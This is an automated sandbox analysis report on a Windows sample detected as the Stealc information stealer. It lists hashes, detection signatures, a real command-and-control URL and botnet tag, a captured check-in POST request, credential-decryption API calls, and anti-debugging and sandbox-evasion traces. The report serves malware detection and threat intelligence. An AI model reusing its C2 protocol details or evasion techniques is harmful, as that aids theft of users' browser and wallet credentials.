
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532351
MD5: cfdd8a903441555e23417125bccc4e60
SHA1: 5ee09d72d09a587d1399d651d5e2d3e199899ae3
SHA256: 51104c217fb4ac57c1ef1071eaf80c801e17a2ca4c1b83a31d2d7a43b5f22671
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CFDD8A903441555E23417125BCCC4E60)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source: Rule, Description, Author):
  • dump.pcap: JoeSecurity_Stealc_1, Yara detected Stealc, Joe Security
  • 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp: JoeSecurity_Stealc, Yara detected Stealc, Joe Security
  • 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_Stealc, Yara detected Stealc, Joe Security
  • 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp: JoeSecurity_Stealc, Yara detected Stealc, Joe Security
  • Process Memory Space: file.exe PID: 6960: JoeSecurity_PowershellDownloadAndExecute, Yara detected Powershell download and execute, Joe Security
  • Process Memory Space: file.exe PID: 6960: JoeSecurity_Stealc, Yara detected Stealc, Joe Security
  • 0.2.file.exe.260000.0.unpack: JoeSecurity_Stealc, Yara detected Stealc, Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alert:
  • Timestamp: 2024-10-13T01:29:11.939162+0200
  • SID: 2044243
  • Severity: 1
  • Classtype: Malware Command and Control Activity Detected
  • Source: 192.168.2.4:49732
  • Destination: 185.215.113.37:80
  • Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.260000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00267240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00269AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00269B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00278EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00274910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00274570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00273EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBF
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Ascii (multipart body, CRLF line endings):
  ------DBKFIDAAEHIEGCBFIDBF
  Content-Disposition: form-data; name="hwid"

  D8B52AEA60BD3120641781
  ------DBKFIDAAEHIEGCBFIDBF
  Content-Disposition: form-data; name="build"

  doma
  ------DBKFIDAAEHIEGCBFIDBF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00264880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800007747.0000000000E55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3S
Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/n
Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37D~f

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006219AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00628236
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072D2F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061FAD5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00576292
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00607A90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00624B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00632319
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629CD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DD5C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061C66C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061BE2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E369F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062BE93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C5F47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00622FF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061DFCA
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nlvthzrj ZLIB complexity 0.9947395752257161
Source: file.exe, 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00279600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00273720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\F0HPVKVL.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1801216 > 1048576
Source: file.exe | Static PE information: Raw size of nlvthzrj is bigger than: 0x100000 < 0x191800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.260000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nlvthzrj:EW;juspdwth:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nlvthzrj:EW;juspdwth:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00279860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c4681 should be: 0x1badc6
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: nlvthzrj
Source: file.exe | Static PE information: section name: juspdwth
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BD860 push eax; mov dword ptr [esp], edi | 0_2_006BD8AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0027B035 push ecx; ret | 0_2_0027B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B4858 push ecx; mov dword ptr [esp], eax | 0_2_006B4878
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070A836 push 523A8313h; mov dword ptr [esp], esi | 0_2_0070A918
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070A836 push 1D1ECA00h; mov dword ptr [esp], edx | 0_2_0070A925
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070A836 push 12552C1Ah; mov dword ptr [esp], esi | 0_2_0070B136
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B6024 push eax; mov dword ptr [esp], ebp | 0_2_006B6041
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push eax; mov dword ptr [esp], ebx | 0_2_0062716A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 43EA138Ah; mov dword ptr [esp], edi | 0_2_006271F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push esi; mov dword ptr [esp], 02A10ACDh | 0_2_00627231
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 58266091h; mov dword ptr [esp], eax | 0_2_00627256
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 7DC8E1F5h; mov dword ptr [esp], edx | 0_2_00627269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push eax; mov dword ptr [esp], 39E7C1ABh | 0_2_00627292
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push edx; mov dword ptr [esp], eax | 0_2_00627327
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push eax; mov dword ptr [esp], 3C5535C0h | 0_2_006273E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 5148EF93h; mov dword ptr [esp], eax | 0_2_00627408
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push esi; mov dword ptr [esp], eax | 0_2_00627452
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push ebx; mov dword ptr [esp], edx | 0_2_0062749A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push ecx; mov dword ptr [esp], edx | 0_2_0062750E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push edi; mov dword ptr [esp], 36BD5483h | 0_2_00627515
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push esi; mov dword ptr [esp], ecx | 0_2_0062758A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push ecx; mov dword ptr [esp], edi | 0_2_006275AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push esi; mov dword ptr [esp], edx | 0_2_00627723
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 516FF8D7h; mov dword ptr [esp], eax | 0_2_0062773A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 3E0E5C60h; mov dword ptr [esp], ebx | 0_2_00627771
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push edx; mov dword ptr [esp], 7B7F87C4h | 0_2_006277AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 732F8736h; mov dword ptr [esp], eax | 0_2_006277D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push ebp; mov dword ptr [esp], 7F32B85Ch | 0_2_00627883
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 00BC7466h; mov dword ptr [esp], eax | 0_2_006278E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push edi; mov dword ptr [esp], 50F4E59Bh | 0_2_0062790C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627006 push 086C67DAh; mov dword ptr [esp], edi | 0_2_0062792B
Source: file.exe | Static PE information: section name: nlvthzrj entropy: 7.953408451979988

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13496
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 636ECA second address: 636EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Ah 0x0000000e jmp 00007F46B8B98B0Ah 0x00000013 jl 00007F46B8B98B0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6371DB second address: 6371E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6371E7 second address: 6371EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 637363 second address: 637367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 637498 second address: 6374A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6374A2 second address: 6374BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6374BF second address: 6374C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6374C3 second address: 6374E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F46B8DCA19Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 637665 second address: 63766B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638F71 second address: 638FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jnc 00007F46B8DCA196h 0x0000000d popad 0x0000000e popad 0x0000000f add dword ptr [esp], 0266D455h 0x00000016 xor dword ptr [ebp+122D19F2h], ecx 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F46B8DCA198h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D2933h], ecx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F46B8DCA198h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a push 00000003h 0x0000005c push A55F2871h 0x00000061 jo 00007F46B8DCA1A0h 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6390AC second address: 639167 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F46B8B98B08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 084F899Ah 0x00000013 jmp 00007F46B8B98B12h 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F46B8B98B08h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 sub dword ptr [ebp+122D1D38h], ebx 0x0000003a call 00007F46B8B98B0Eh 0x0000003f mov cx, dx 0x00000042 pop edx 0x00000043 push 00000000h 0x00000045 adc ecx, 1594D621h 0x0000004b push 00000003h 0x0000004d call 00007F46B8B98B18h 0x00000052 mov edx, 6F2D60DBh 0x00000057 pop edx 0x00000058 call 00007F46B8B98B09h 0x0000005d jnp 00007F46B8B98B13h 0x00000063 jmp 00007F46B8B98B0Dh 0x00000068 push eax 0x00000069 jmp 00007F46B8B98B0Fh 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639167 second address: 639179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639179 second address: 63917E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63917E second address: 639197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F46B8DCA196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jc 00007F46B8DCA1A0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639197 second address: 639201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b je 00007F46B8B98B08h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pop eax 0x00000015 call 00007F46B8B98B0Ah 0x0000001a mov dl, EAh 0x0000001c pop edx 0x0000001d lea ebx, dword ptr [ebp+1244AE4Fh] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F46B8B98B08h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov edx, dword ptr [ebp+122D37A2h] 0x00000043 push eax 0x00000044 pushad 0x00000045 jmp 00007F46B8B98B11h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639201 second address: 639205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C346 second address: 64C34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659FB7 second address: 659FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659FBB second address: 659FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
